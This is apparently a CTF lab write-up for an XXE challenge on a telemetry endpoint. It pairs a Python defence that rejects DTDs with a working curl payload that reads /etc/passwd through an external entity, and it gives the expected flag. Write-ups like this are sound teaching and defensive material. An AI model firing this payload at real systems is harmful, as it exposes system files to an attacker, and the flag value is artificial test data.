
Blind Trust - TOKEN1

Base URL: http://nebula:5000

Background

The /telemetry/submit endpoint parses the XML passed in the node parameter without disabling external entity resolution, so XML External Entity (XXE) injection can be used to read local files from the server.
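
The write-up does not show the server-side code, so the following is an added example (not the challenge's own code, and Python is an assumption) of how a parser for the node parameter can be made to refuse this class of input. Rather than trying to spot a bad entity after the fact, it installs expat's DOCTYPE and entity-declaration callbacks and aborts the parse the moment a DTD appears, which is the only way an external entity can be declared. The helper names (parse_node_xml, submission_status) and the sample inputs are constructed for the example.

```python
import xml.parsers.expat as expat


class DtdNotAllowed(ValueError):
    """Raised when the submitted XML carries a DOCTYPE or entity declaration."""


def parse_node_xml(node_xml: str) -> tuple:
    """Parse the ``node`` parameter into (root_tag, text), refusing any DTD.

    External entities can only be declared inside a DOCTYPE, so the parser
    stops at the DOCTYPE itself; an &xxe; reference is never expanded.
    """
    parser = expat.ParserCreate()
    result = {"root": None, "text": []}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed(
            f"DOCTYPE {name!r} rejected (system id {sysid!r}, "
            f"internal subset: {bool(has_internal_subset)})"
        )

    def on_entity_decl(entity_name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        # Normally unreachable because on_doctype fires first; kept so an
        # entity declaration can never slip through if the handler set changes.
        raise DtdNotAllowed(f"entity {entity_name!r} rejected")

    def on_start(tag, attrs):
        if result["root"] is None:
            result["root"] = tag

    def on_chars(data):
        result["text"].append(data)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.Parse(node_xml, True)  # exceptions raised in handlers propagate here
    return result["root"], "".join(result["text"])


def submission_status(node_xml: str) -> str:
    """What the endpoint should answer: 'ok' for plain XML, 'rejected' for
    DTD-bearing input, 'malformed' for anything expat cannot parse."""
    try:
        parse_node_xml(node_xml)
        return "ok"
    except DtdNotAllowed:
        return "rejected"
    except expat.ExpatError:
        return "malformed"


# Constructed inputs: a benign submission and the DTD-bearing shape from the write-up.
BENIGN = "<node><hostname>web-01</hostname></node>"
XXE_SHAPED = ('<?xml version="1.0"?>'
              '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
              '<x>&xxe;</x>')

if __name__ == "__main__":
    print(parse_node_xml(BENIGN))        # ('node', 'web-01')
    print(submission_status(XXE_SHAPED))  # rejected
```

Rejecting every DTD, internal entities included, is deliberate: telemetry payloads have no business carrying one, and a blanket refusal is simpler to reason about than a list of allowed entity types. An entity reference with no DTD to define it is a well-formedness error, which the status helper reports as malformed rather than rejected.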

From Nothing to Working

Start point: the challenge note mentions XML-driven components and retrieving data from /etc/passwd.

Iterations:

  1. Visit /telemetry/submit to confirm it accepts POST data with a node parameter.
  2. Submit a basic XML payload to verify parsing.
  3. Inject an XXE payload with a SYSTEM entity pointing to file:///etc/passwd.
  4. The server returns the file contents, including the token embedded as a fake user entry.

Goal

Exploit the XXE vulnerability to read /etc/passwd and extract the token.

Command

curl -X POST http://nebula:5000/telemetry/submit \
  -d 'node=<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>'

Expected Output

Look for a line in the passwd output containing:

TOKEN1::PCCC{BLT-z7B6SO}:0:0:root:/root:/bin/bash

Learn More